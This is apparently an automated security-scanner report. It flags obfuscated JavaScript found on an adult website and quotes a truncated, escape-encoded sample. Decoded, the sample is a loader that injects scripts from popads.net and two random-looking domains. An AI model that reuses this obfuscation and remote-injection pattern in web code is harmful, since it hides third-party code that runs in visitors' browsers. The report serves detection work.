generic_javascript_obfuscation in best-porno.xyz

On 2019-08-07T01:50:41.192883+00:00 we found the suspicious pattern generic_javascript_obfuscation (type: Suspicious) in the page http://best-porno.xyz/. JavaScript obfuscation is frequently used to hide malicious code (or in the hope of protecting intellectual property).

The suspicious code sample:

b'var i=["\\u002f\\u002f\\u0063\\x31\\x2ep\\x6f\\x70\\x61\\x64\\x73.n\\x65\\u0074\\u002f\\u0070\\u006fp.\\x6a\\x73","\\x2f\\x2f\\u00632.po\\u0070\\x61\\u0064s\\x2en\\x65\\u0074/p\\u006f\\x70\\u002e\\x6a\\x73","\\x2f\\u002f\\x77\\u0077w\\x2e\\u0079k\\x68\\x6fz\\u006bl\\x6afp\\u0064td\\x2ec\\x6f\\x6d\\x2f\\u0061\\x2ej\\u0073","\\u002f\\u002f\\u0077\\x77\\x77\\u002e\\x71y\\u0064\\u007a\\x79crx\\x6c\\u006b\\x64l\\x69\\x6e\\u002e\\u0063\\x6f\\x6d/z\\u006etv\\u002e\\x6a\\x73",""],s=0,r,u=function(){if(""==i[s])return;r=z["\\x64\\x6fc\\x75m\\x65\\u006e\\x74"]["\\x63re\\x61\\x74\\x65Ele\\u006d\\x65\\' …

This feature is experimental, so please feel free to contact us if you feel any of the reported issues is a false positive or if you want to suggest a pattern that should be detected (we use the YARA standard).
